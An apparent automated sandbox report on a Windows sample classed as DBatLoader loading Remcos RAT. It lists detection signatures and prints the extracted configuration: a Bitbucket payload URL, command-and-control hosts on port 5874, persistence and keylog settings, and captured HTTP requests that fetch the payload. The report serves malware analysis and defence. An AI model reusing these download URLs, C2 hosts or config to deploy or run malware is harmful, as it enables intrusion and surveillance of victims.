Windows Analysis Report
jW3NEKvxH1.exe

Overview

General Information

Sample name: jW3NEKvxH1.exe
renamed because original name is a hash value
Original sample name: e4696be1368f7ac260c605c7b4f7eeaf.exe
Analysis ID: 1569880
MD5: e4696be1368f7ac260c605c7b4f7eeaf
SHA1: d73a7226926b44f66d94ff7b229ef8243976eb6d
SHA256: 592624f30b177058eba9b5b36e2e72bea42af95bf1552ca9a9ca28c4e1e6cfeb
Tags: exeuser-abuse_ch
Infos:

Detection

Remcos, DBatLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Early bird code injection technique detected
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected DBatLoader
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Queues an APC in another process (thread injection)
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Remcos, RemcosRAT Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
 https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
Name Description Attribution Blogpost URLs Link
DBatLoader This Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

AV Detection
barindex
Found malware configuration
Source: jW3NEKvxH1.exe Malware Configuration Extractor: DBatLoader {"Download Url": ["https://bitbucket.org/masterservicwes/mastermanservices/downloads/165_Dlaybpxloke"]}
Source: 00000006.00000002.4603655140.0000000000607000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: Remcos {"Host:Port:Password": ["zara.master-workdone.com.ua:5874:1", "manazara.master-workdone.com.ua:5874:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-RX8VCL", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
Multi AV Scanner detection for dropped file
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF ReversingLabs: Detection: 55%
Multi AV Scanner detection for submitted file
Source: jW3NEKvxH1.exe ReversingLabs: Detection: 55%
Yara detected Remcos RAT
Source: Yara match File source: 19.2.SndVol.exe.2940000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.colorcpl.exe.2460000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.colorcpl.exe.2460000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.SndVol.exe.2920000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.SndVol.exe.2920000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.SndVol.exe.2940000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.jW3NEKvxH1.exe.2d30000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.4603655140.0000000000607000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2435347353.0000000021D67000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2475144100.0000000002460000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2410456379.0000000002940000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2511848182.0000000033ED0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2288933657.000000007E7A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: jW3NEKvxH1.exe PID: 616, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: SndVol.exe PID: 4576, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: SndVol.exe PID: 3648, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: colorcpl.exe PID: 2680, type: MEMORYSTR
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_0295293A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext, 6_2_0295293A
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_0297293A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext, 19_2_0297293A
Source: jW3NEKvxH1.exe Binary or memory string: -----BEGIN PUBLIC KEY-----

Exploits
barindex
Yara detected UAC Bypass using CMSTP
Source: Yara match File source: 19.2.SndVol.exe.2940000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.colorcpl.exe.2460000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.colorcpl.exe.2460000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.SndVol.exe.2920000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.SndVol.exe.2920000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.SndVol.exe.2940000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.jW3NEKvxH1.exe.2d30000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2475144100.0000000002460000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2410456379.0000000002940000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2288933657.000000007E7A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: jW3NEKvxH1.exe PID: 616, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: SndVol.exe PID: 4576, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: SndVol.exe PID: 3648, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: colorcpl.exe PID: 2680, type: MEMORYSTR

Privilege Escalation
barindex
Contains functionality to bypass UAC (CMSTPLUA)
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_02926764 _wcslen,CoGetObject, 6_2_02926764
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_02946764 _wcslen,CoGetObject, 19_2_02946764
Uses 32bit PE files
Source: jW3NEKvxH1.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: unknown HTTPS traffic detected: 185.166.143.50:443 -> 192.168.2.6:49716 version: TLS 1.2
Source: unknown HTTPS traffic detected: 3.5.30.3:443 -> 192.168.2.6:49718 version: TLS 1.2
Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: easinvoker.pdb source: jW3NEKvxH1.exe, jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2280895111.0000000020A86000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2280895111.0000000020A3E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2280895111.0000000020A6E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2146235666.000000007F920000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2145769596.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2266110150.0000000002366000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: cmd.pdbUGP source: esentutl.exe, 00000004.00000003.2245097882.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, alpha.pif, 00000009.00000000.2272956424.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, alpha.pif, 0000000A.00000000.2294839083.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, alpha.pif, 0000000B.00000002.2390955236.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, alpha.pif, 00000011.00000002.2395576863.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, alpha.pif, 00000012.00000000.2403173477.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, alpha.pif, 00000014.00000000.2410473637.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, alpha.pif.4.dr
Source: Binary string: ping.pdbGCTL source: esentutl.exe, 00000008.00000003.2265634215.00000000055D0000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, 0000000C.00000002.2390214130.0000000000841000.00000020.00000001.01000000.00000008.sdmp, xpha.pif.8.dr
Source: Binary string: easinvoker.pdbH source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: easinvoker.pdbGCTL source: jW3NEKvxH1.exe, 00000000.00000002.2280895111.0000000020A86000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2280895111.0000000020A3E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2280895111.0000000020A6E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2146235666.000000007F920000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2249226014.0000000021B2D000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2249226014.0000000021B5E000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2266672340.000000000282C000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2145769596.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2145952303.000000000282E000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2266110150.0000000002366000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: cmd.pdb source: alpha.pif, alpha.pif, 0000000B.00000002.2390955236.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, alpha.pif, 00000011.00000002.2395576863.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, alpha.pif, 00000012.00000000.2403173477.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, alpha.pif, 00000014.00000000.2410473637.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, alpha.pif.4.dr
Source: Binary string: ping.pdb source: esentutl.exe, 00000008.00000003.2265634215.00000000055D0000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, xpha.pif, 0000000C.00000002.2390214130.0000000000841000.00000020.00000001.01000000.00000008.sdmp, xpha.pif.8.dr
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D35908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA, 0_2_02D35908
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_0292B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 6_2_0292B335
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_0293B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose, 6_2_0293B42F
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_0296D5E9 FindFirstFileExA, 6_2_0296D5E9
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_0292B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 6_2_0292B53A
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_02927A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8, 6_2_02927A8C
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_02926AC2 FindFirstFileW,FindNextFileW, 6_2_02926AC2
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_029289A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8, 6_2_029289A9
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_02938C69 FindFirstFileW,FindNextFileW,FindNextFileW, 6_2_02938C69
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_02928DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose, 6_2_02928DA7
Source: C:\Users\Public\alpha.pif Code function: 9_2_00E40207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove, 9_2_00E40207
Source: C:\Users\Public\alpha.pif Code function: 9_2_00E4589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose, 9_2_00E4589A
Source: C:\Users\Public\alpha.pif Code function: 9_2_00E44EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW, 9_2_00E44EC1
Source: C:\Users\Public\alpha.pif Code function: 9_2_00E53E66 FindFirstFileW,FindNextFileW,FindClose, 9_2_00E53E66
Source: C:\Users\Public\alpha.pif Code function: 9_2_00E3532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose, 9_2_00E3532E
Source: C:\Users\Public\alpha.pif Code function: 11_2_00E4589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose, 11_2_00E4589A
Source: C:\Users\Public\alpha.pif Code function: 11_2_00E40207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove, 11_2_00E40207
Source: C:\Users\Public\alpha.pif Code function: 11_2_00E44EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW, 11_2_00E44EC1
Source: C:\Users\Public\alpha.pif Code function: 11_2_00E53E66 FindFirstFileW,FindNextFileW,FindClose, 11_2_00E53E66
Source: C:\Users\Public\alpha.pif Code function: 11_2_00E3532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose, 11_2_00E3532E
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_0294B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 19_2_0294B335
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_0295B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose, 19_2_0295B42F
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_0298D5E9 FindFirstFileExA, 19_2_0298D5E9
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_0294B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 19_2_0294B53A
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_02947A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8, 19_2_02947A8C
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_02946AC2 FindFirstFileW,FindNextFileW, 19_2_02946AC2
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_029489A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8, 19_2_029489A9
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_02958C69 FindFirstFileW,FindNextFileW,FindNextFileW, 19_2_02958C69
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_02948DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose, 19_2_02948DA7
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_02926F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW, 6_2_02926F06

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49730 -> 104.243.42.254:5874
Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49785 -> 104.243.42.254:5874
Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49856 -> 104.243.42.254:5874
Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49914 -> 104.243.42.254:5874
Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49967 -> 104.243.42.254:5874
Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50018 -> 104.243.42.254:5874
Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50031 -> 104.243.42.254:5874
Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50032 -> 104.243.42.254:5874
Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50030 -> 104.243.42.254:5874
Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50028 -> 104.243.42.254:5874
Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50033 -> 104.243.42.254:5874
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: https://bitbucket.org/masterservicwes/mastermanservices/downloads/165_Dlaybpxloke
Source: Malware configuration extractor URLs: zara.master-workdone.com.ua
Source: Malware configuration extractor URLs: manazara.master-workdone.com.ua
Contains functionality to check if a connection to the internet is available
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D4E4B8 InternetCheckConnectionA, 0_2_02D4E4B8
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.6:49730 -> 104.243.42.254:5874
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.166.143.50 185.166.143.50
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: RELIABLESITEUS RELIABLESITEUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49718 -> 3.5.30.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49716 -> 185.166.143.50:443
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /masterservicwes/mastermanservices/downloads/165_Dlaybpxloke HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: bitbucket.org
Source: global traffic HTTP traffic detected: GET /03fa479d-619a-4b32-874d-a4ddf918e902/downloads/2601acd3-63c3-4b6f-aebd-6df9054b3482/165_Dlaybpxloke?response-content-disposition=attachment%3B%20filename%3D%22165_Dlaybpxloke%22&AWSAccessKeyId=ASIA6KOSE3BNPUMJB2N4&Signature=lPpKAn0ReHQbH3DpienqaxZzNLo%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEHIaCXVzLWVhc3QtMSJIMEYCIQCaZkGDFyxBoRgAK4dmP5GUp0SY87BURv7X14RQrwEcZgIhAMetywssY5BhL8pY%2FtG26ZU6vERKuy%2FAVKUuXoBcCnK1KqcCCCsQABoMOTg0NTI1MTAxMTQ2IgyUI9V0VJ8H5yjEvdkqhALsEBIC2rYjECe9FxMRnaue0tWUjriw4Hncuptkdwv33JFaLSq5PAcZ7j0wHx5XTplvXQu0B%2BAVF%2BA7w7OoltUA9YEMD1dli4GhwmLw98H7TnsbJxv%2FAfH5jmYjDgNSeefRwq6dAL84iBBiGO%2BTcrZRP0bRK0UmrAMflcU24c9z1OpZvZUoh8xhJivA3GqRpKweY6B3FcJAT%2FE3nJCW9heW4uO%2FwIjWxMnZfhnXKm8yFawEBgORWNzIvaslhtOM4sRJxbEPTznZKwjZYmaP1oFmi66IfRK6h10tQ%2Ffh58rfDiVaxxUtMhmVces3NbVCtUDHXTZO01oYfFXpzFfw1Iokuk5LEzCjksu6BjqcARY%2FAHp8g2KBhslGF9Frk4I8oled3sypm%2FnQFVM%2BPCh2Z44y5IQLfMLnMkgcML2U3jqY%2F2%2BStuIb%2BFoD99teigmj8%2BuaolR%2BMXe%2FGwZ7UgMk%2FRQdZKpZro%2F6dfGCGZytk7EGcfIrQ5l%2F7x%2BltpFGD%2F65w%2BoCYBUwnHQOgiJLucLeN8XglIkhzkhQFYiFvroeURjDmWQBwBq5NvFGgQ%3D%3D&Expires=1733480491 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: bbuseruploads.s3.amazonaws.com
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_029460F7 recv, 6_2_029460F7
Source: global traffic HTTP traffic detected: GET /masterservicwes/mastermanservices/downloads/165_Dlaybpxloke HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: bitbucket.org
Source: global traffic HTTP traffic detected: GET /03fa479d-619a-4b32-874d-a4ddf918e902/downloads/2601acd3-63c3-4b6f-aebd-6df9054b3482/165_Dlaybpxloke?response-content-disposition=attachment%3B%20filename%3D%22165_Dlaybpxloke%22&AWSAccessKeyId=ASIA6KOSE3BNPUMJB2N4&Signature=lPpKAn0ReHQbH3DpienqaxZzNLo%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEHIaCXVzLWVhc3QtMSJIMEYCIQCaZkGDFyxBoRgAK4dmP5GUp0SY87BURv7X14RQrwEcZgIhAMetywssY5BhL8pY%2FtG26ZU6vERKuy%2FAVKUuXoBcCnK1KqcCCCsQABoMOTg0NTI1MTAxMTQ2IgyUI9V0VJ8H5yjEvdkqhALsEBIC2rYjECe9FxMRnaue0tWUjriw4Hncuptkdwv33JFaLSq5PAcZ7j0wHx5XTplvXQu0B%2BAVF%2BA7w7OoltUA9YEMD1dli4GhwmLw98H7TnsbJxv%2FAfH5jmYjDgNSeefRwq6dAL84iBBiGO%2BTcrZRP0bRK0UmrAMflcU24c9z1OpZvZUoh8xhJivA3GqRpKweY6B3FcJAT%2FE3nJCW9heW4uO%2FwIjWxMnZfhnXKm8yFawEBgORWNzIvaslhtOM4sRJxbEPTznZKwjZYmaP1oFmi66IfRK6h10tQ%2Ffh58rfDiVaxxUtMhmVces3NbVCtUDHXTZO01oYfFXpzFfw1Iokuk5LEzCjksu6BjqcARY%2FAHp8g2KBhslGF9Frk4I8oled3sypm%2FnQFVM%2BPCh2Z44y5IQLfMLnMkgcML2U3jqY%2F2%2BStuIb%2BFoD99teigmj8%2BuaolR%2BMXe%2FGwZ7UgMk%2FRQdZKpZro%2F6dfGCGZytk7EGcfIrQ5l%2F7x%2BltpFGD%2F65w%2BoCYBUwnHQOgiJLucLeN8XglIkhzkhQFYiFvroeURjDmWQBwBq5NvFGgQ%3D%3D&Expires=1733480491 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: bbuseruploads.s3.amazonaws.com
